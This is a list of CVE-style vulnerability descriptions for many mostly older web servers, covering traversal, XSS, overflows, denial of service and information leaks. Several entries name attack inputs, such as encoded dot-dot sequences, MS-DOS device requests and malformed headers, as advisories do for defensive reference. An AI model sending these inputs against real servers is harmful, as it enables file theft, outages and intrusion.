TeamSpeak WebServer 2.0 for Windows does not validate parameter value lengths and does not expire TCP sessions, which allows remote attackers to cause a denial of service (CPU and memory consumption) via long username and password parameters in a request to login.tscmd on TCP port 14534.
Cross-site scripting (XSS) vulnerability in the embedded webserver in Daniel Naber LanguageTool before 0.8.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving an error message, possibly the demultiplex method in HTTPServer.java.
Directory traversal vulnerability in the Plain Old Webserver (POW) add-on before 0.0.9 for Mozilla Firefox allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
Directory traversal vulnerability in the AVM IGD CTRL Service in Fritz!DSL 02.02.29 allows remote attackers to read arbitrary files via ..%5C (URL-encoded dot dot backslash) sequences in a URI requested from the AR7 webserver.
AIDeX Mini-WebServer 1.1 early release 3 allows remote attackers to cause a denial of service (daemon crash) via a flood of HTTP GET requests, possibly related to display of HTTP log data by the GUI. NOTE: some of these details are obtained from third party information.
PHP remote file inclusion vulnerability in news/include/customize.php in Web Server Creator 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the l parameter.
Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
Unspecified vulnerability in the loaders (load_*.php) in Ansilove before 1.03 allows remote attackers to read arbitrary files via unspecified vectors involving "converting files accessible by the webserver".
Yaws Webserver 1.55 and earlier allows remote attackers to obtain the source code for yaws scripts via a request to a yaw script with a trailing %00 (null).
Jeuce Personal Webserver 2.13 allows remote attackers to cause a denial of service (server crash) via a long GET request, possibly triggering a buffer overflow.
PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (memory exhaustion and process crash) via a large number of HTTP requests.
PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to determine the existence of files via an HTTP request with a full pathname, which produces different messages whether the file exists or not.
PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to obtain the full path of the web server via a request for a non-existent filename, which leaks the full path in an error message.
PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service (CPU consumption) via a direct request to Filelist.html.
PY Software Active Webcam WebServer (webcam.exe) 5.5 allows remote attackers to cause a denial of service via a request to a file on the floppy drive, as demonstrated using A:\a.txt.
Directory traversal vulnerability in CIS WebServer 3.5.13 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the URL.
Directory traversal vulnerability in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to write arbitrary files via a .. (dot dot) in the attfile parameter.
Buffer overflow in postfile.exe for Twilight Utilities Web Server 2.0.0.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL request with a long attfile attribute.
Cross-site scripting (XSS) vulnerability in BRS WebWeaver 1.07 allows remote attackers to execute arbitrary script as other users via the query string to ISAPISkeleton.dll.
Reptile Web Server allows remote attackers to cause a denial of service (CPU consumption) via multiple incomplete GET requests without the HTTP version.
Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to cause a denial of service (CPU consumption or crash) via many large HTTP requests.
Easy File Sharing (EFS) Webserver 1.25 allows remote attackers to view arbitrary files via an HTTP request for the disk_c virtual folder.
BadBlue 2.5 allows remote attackers to cause a denial of service (refuse HTTP connections) via a large number of connections from the same IP address.
Directory traversal vulnerability in Xedus 1.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
Cross-site scripting (XSS) vulnerability in Xedus 1.0 allows remote attackers to execute arbitrary web script or HTML via the (1) username parameter to test.x, (2) username parameter to TestServer.x, or (3) param parameter to testgetrequest.x.
Xedus 1.0 allows remote attackers to cause a denial of service (refuse connections) by connecting multiple times from the same IP address.
The Solaris Management Console (SMC) in Sun Solaris 8 and 9 generates different 404 error messages when a file does not exist versus when a file exists but is otherwise inaccessible, which could allow remote attackers to obtain sensitive information in conjunction with a directory traversal (..) attack.
PHP 4.x to 4.3.9, and PHP 5.x to 5.0.2, when running in safe mode on a multithreaded Unix webserver, allows local users to bypass safe_mode_exec_dir restrictions and execute commands outside of the intended safe_mode_exec_dir via shell metacharacters in the current directory name.  NOTE: this issue was originally REJECTed by its CNA before publication, but that decision is in active dispute.  This candidate may change significantly in the future as a result of further discussion.
Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385.
GoAhead WebServer before 2.1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an invalid URL, related to the websSafeUrl function.
The remote web management interface of Aprelium Technologies Abyss Web Server 1.1.2 and earlier does not log connection attempts to the web management port (9999), which allows remote attackers to mount brute force attacks on the administration console without detection.
CRLF injection vulnerability in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to inject arbitrary HTTP headers and possibly conduct HTTP Response Splitting attacks via CRLF sequences in the Location header.
Heap-based buffer overflow in Aprelium Abyss Web Server 1.1.2 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Twilight Webserver 1.3.3.0 allows remote attackers to cause a denial of service (application crash) via a GET request for a long URI, a different vulnerability than CVE-2004-2376.
Cross-site scripting (XSS) vulnerability in Fastream NETFile Server 6.0.3.588 allows remote attackers to inject arbitrary web script or HTML via the URL, which is displayed on a "404 Not Found" error page.
Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
hpnst.exe in the GoAhead-Webs webserver for HP Instant TopTools before 5.55 allows remote attackers to cause a denial of service (CPU consumption) via a request to hpnst.exe that calls itself, which causes an infinite loop.
Unspecified vulnerability in GoAhead WebServer before 2.1.4 allows remote attackers to cause "incorrect behavior" via unknown "malicious code," related to incorrect use of the socketInputBuffered function by sockGen.c.
GoAhead WebServer before 2.1.1 allows remote attackers to cause a denial of service (CPU consumption) by performing a socket disconnect to terminate a request before it has been fully processed by the server.
webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (daemon crash) via an HTTP POST request that contains a negative integer in the Content-Length header.
webs.c in GoAhead WebServer before 2.1.4 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an HTTP POST request that contains a Content-Length header but no body data.
The security handler in GoAhead WebServer before 2.1.1 allows remote attackers to bypass authentication and obtain access to protected web content via "an extra slash in a URL," a different vulnerability than CVE-2002-1603.
Directory traversal vulnerability in pWins Webserver 0.2.5 and earlier allows remote attackers to read arbitrary files via Unicode characters.
Directory traversal vulnerability in MyServer 0.11 and 0.2 allows remote attackers to read arbitrary files via a ".." (dot dot) in an HTTP GET request.
Cross-site scripting (XSS) vulnerability in ActiveXperts Software ActiveWebserver allows remote attackers to execute arbitrary web script via a link.
Joe Testa hellbent 01 webserver allows attackers to read files that are specified in the hellbent.prefs file by creating a file with a similar name in the web root, as demonstrated using (1) index.webroot and (2) index.ipallow.
Lotus Domino server 5.0.9a and earlier allows remote attackers to cause a denial of service by exhausting the number of working threads via a large number of HTTP requests for (1) an MS-DOS device name and (2) an MS-DOS device name with a large number of characters appended to the device name.
Lotus Domino 5.0.8 web server returns different error messages when a valid or invalid user is provided in HTTP requests, which allows remote attackers to determine valid user names and makes it easier to conduct brute force attacks.
Buffer overflow in GoAhead WebServer 2.1 allows remote attackers to execute arbitrary code via a long HTTP GET request with a large number of subdirectories.
Buffer overflow in RadioBird WebServer 4 Everyone 1.28 allows remote attackers to cause a denial of service (crash) via a long HTTP GET request with the Host header set.
jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF.").
Savant Webserver 3.1 allows remote attackers to cause a denial of service (crash) via an HTTP GET request with a negative Content-Length value.
Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability.
BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con.  NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves.
The Post_Method function in method.c for Monkey HTTP Daemon before 0.5.1 allows remote attackers to cause a denial of service (crash) via a POST request with an invalid or missing Content-Length header value.
Secure Webserver 1.1 in Raptor 6.5 and Symantec Enterprise Firewall 6.5.2 allows remote attackers to identify IP addresses of hosts on the internal network via a CONNECT request, which generates different error messages if the host is present.
Web Server 4D (WS4D) 3.6 stores passwords in plaintext in the Ws4d.4DD file, which allows attackers to gain privileges.
Directory traversal vulnerability in WebServer 4 Everyone 1.22 allows remote attackers to read arbitrary files via "..\" (dot-dot backslash) sequences in a URL.
importInfo in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows the web administrator to execute arbitrary commands via shell metacharacters in the dir parameter, and possibly allows remote attackers to exploit this vulnerability via a separate XSS issue (CVE-2002-1315).
Cross-site scripting (XSS) vulnerability in the Admin Server for iPlanet WebServer 4.x, up to SP11, allows remote attackers to execute web script or HTML as the iPlanet administrator by injecting the desired script into error logs, and possibly escalating privileges by using the XSS vulnerability in conjunction with another issue (CVE-2002-1316).
Directory traversal vulnerability in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to read arbitrary files via an HTTP request with ".." (dot-dot) sequences containing URL-encoded forward slash ("%2F") characters.
Buffer overflow in RadioBird Software WebServer 4 Everyone 1.23 and 1.27, and other versions before 1.30, allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.
Encoded directory traversal vulnerability in Dino's web server 2.1 allows remote attackers to read arbitrary files via ".." (dot dot) sequences with URL-encoded (1) "/" (%2f") or (2) "\" (%5c) characters.
Jigsaw 2.2.1 on Windows systems allows remote attackers to use MS-DOS device names in HTTP requests to (1) cause a denial of service using the "con" device, or (2) obtain the physical path of the server using two requests to the "aux" device.
The web proxy component in Symantec Enterprise Firewall (SEF) 6.5.2 through 7.0, Raptor Firewall 6.5 and 6.5.3, VelociRaptor, and Symantec Gateway Security allow remote attackers to cause a denial of service (connection resource exhaustion) via multiple connection requests to domains whose DNS server is unresponsive or does not exist, which generates a long timeout.
Directory traversal vulnerability in Lysias Lidik web server 0.7b allows remote attackers to list directories via an HTTP request with a ... (modified dot dot).
Sambar web server before 5.2 beta 1 allows remote attackers to obtain source code of server-side scripts, or cause a denial of service (resource exhaustion) via DOS devices, using a URL that ends with a space and a null character.
Directory traversal vulnerability in GoAhead Web Server 2.1 allows remote attackers to read arbitrary files via a URL with an encoded / (%5C) in a .. (dot dot) sequence.  NOTE: it is highly likely that this candidate will be REJECTED because it has been reported to be a duplicate of CVE-2001-0228.
Buffer overflow in 4D WebServer 6.7.3 allows remote attackers to cause a denial of service and possibly execute arbitrary code via an HTTP request with Basic Authentication containing a long (1) user name or (2) password.
Directory traversal vulnerability in Aprelium Abyss Web Server (abyssws) before 1.0.0.2 allows remote attackers to read files outside the web root, including the abyss.conf file, via URL-encoded .. (dot dot) sequences in the HTTP request.
htcgibin.exe in Lotus Domino server 5.0.9a and earlier, when configured with the NoBanner setting, allows remote attackers to determine the version number of the server via a request that generates an HTTP 500 error code, which leaks the version in a hard-coded error message.
htcgibin.exe in Lotus Domino server 5.0.9a and earlier allows remote attackers to determine the physical pathname for the server via requests that contain certain MS-DOS device names such as com5, such as (1) a request with a .pl or .java extension, or (2) a request containing a large number of periods, which causes htcgibin.exe to leak the pathname in an error message.
comment2.jse in ScriptEase:WebServer allows remote attackers to read arbitrary files by specifying the target file as an argument in the URL.
Dino's Webserver 1.2 allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via several large HTTP requests within a short time.
Lotus Domino server 5.0.8 with NoBanner enabled allows remote attackers to (1) determine the physical path of the server via a request for a nonexistent file with a .pl (Perl) extension, which leaks the pathname in the error message, or (2) make any request that causes an HTTP 500 error, which leaks the server's version name in the HTTP error message.
CGI handler in John Roy Pi3Web for Windows 2.0 beta 1 and 2 allows remote attackers to cause a denial of service (crash) via a series of requests whose physical path is exactly 260 characters long and ends in a series of . (dot) characters.
cgitest.exe in Sambar Server 5.1 before Beta 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long argument.
Directory traversal vulnerability in Funsoft Dino's Webserver 1.2 and earlier allows remote attackers to read files or execute arbitrary commands via a .. (dot dot) in the URL.
Buffer overflow in Michael Lamont Savant Web Server 3.0 allows remote attackers to cause a denial of service (crash) via a long HTTP request to the cgi-bin directory in which the CGI program name contains a large number of . (dot) characters.
Xitami 2.4 through 2.5 b4 stores the Administrator password in plaintext in the default.aut file, whose default permissions are world-readable, which allows remote attackers to gain privileges.
Cherokee web server before 0.2.7 does not properly drop root privileges after binding to port 80, which could allow remote attackers to gain privileges via other vulnerabilities.
Directory traversal vulnerability in Cherokee Web Server allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to cause a denial of service via a long HTTP request.
Directory traversal vulnerability in ACI 4d webserver allows remote attackers to read arbitrary files via a .. (dot dot) or drive letter (e.g., C:) in an HTTP request.
Acme Thttpd Secure Webserver before 2.22, with the chroot option enabled, allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /.
Beck IPC GmbH IPC@CHIP Embedded-Webserver allows remote attackers to read arbitrary files via a webserver root directory set to system root.
O'Reilly Website Professional 2.5.4 and earlier allows remote attackers to determine the physical path to the root directory via a URL request containing a ":" character.
T. Hauck Jana Webserver 2.01 beta 1 and earlier allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name (i.e. GET /aux HTTP/1.0).
T. Hauck Jana Webserver 1.46 and earlier allows a remote attacker to view arbitrary files via a '..' (dot dot) attack which is URL encoded (%2e%2e).
Tektronix PhaserLink 850 does not require authentication for access to configuration pages such as _ncl_subjects.shtml and _ncl_items.shtml, which allows remote attackers to modify configuration information and cause a denial of service by accessing the pages.
Directory traversal vulnerability in Perl web server 0.3 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the URL.
GoAhead webserver 2.1 allows remote attackers to cause a denial of service via an HTTP request to the /aux directory.
Directory traversal vulnerability in Caucho Resin 1.2.2 allows remote attackers to read arbitrary files via a "\.." (dot dot) in a URL request.
HSWeb 2.0 HTTP server allows remote attackers to obtain the physical path of the server via a request to the /cgi/ directory, which will list the path if directory browsing is enabled.
24Link 1.06 web server allows remote attackers to bypass access restrictions by prepending strings such as "/+/" or "/." to the HTTP GET request.
The search97cgi/vtopic" in the UnixWare 7 scohelphttp webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack.
The sample Java servlet "test" in Bajie HTTP web server 0.30a reveals the real pathname of the web document root.
Bajie HTTP web server 0.30a allows remote attackers to read arbitrary files via a URL that contains a "....", a variant of the dot dot directory traversal attack.
O'Reilly WebSite Pro 2.3.7 installs the uploader.exe program with execute permissions for all users, which allows remote attackers to create and execute arbitrary files by directly calling uploader.exe.
Savant web server allows remote attackers to execute arbitrary commands via a long GET request.
Guild FTPd allows remote attackers to determine the existence of files outside the FTP root via a .. (dot dot) attack, which provides different error messages depending on whether the file exists or not.
Savant web server allows remote attackers to read source code of CGI scripts via a GET request that does not include the HTTP version number.
Web server in Tektronix PhaserLink Printer 840.0 and earlier allows a remote attacker to gain administrator access by directly calling undocumented URLs such as ncl_items.html and ncl_subjects.html.
The Sun HotSpot Performance Engine VM allows a remote attacker to cause a denial of service on any server running HotSpot via a URL that includes the [ character.
Oracle Webserver 2.1 and earlier runs setuid root, but the configuration file is owned by the oracle account, which allows any local or remote attacker who obtains access to the oracle account to gain privileges or modify arbitrary files by modifying the configuration file.
Directory traversal vulnerability in Jana proxy web server 1.40 allows remote attackers to ready arbitrary files via a "......" (modified dot dot) attack.
Vulnerability in files.pl script in Novell WebServer Examples Toolkit 2 allows remote attackers to read arbitrary files.
Oracle Webserver 2.1, when serving PL/SQL stored procedures, allows remote attackers to cause a denial of service via a long HTTP GET request.
TeamTrack web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
URL Live! web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
iChat ROOMS Webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack.
The Zeus web server administrative interface uses weak encryption for its passwords.
Zeus web server allows remote attackers to read arbitrary files by specifying the file name in an option to the search engine.
The ICQ Webserver allows remote attackers to use .. to access arbitrary files outside of the user's personal directory.
Buffer overflow in NCSA WebServer (1.4.1 and below) gives remote access.
Buffer overflow in NCSA WebServer (version 1.5c) gives remote access.

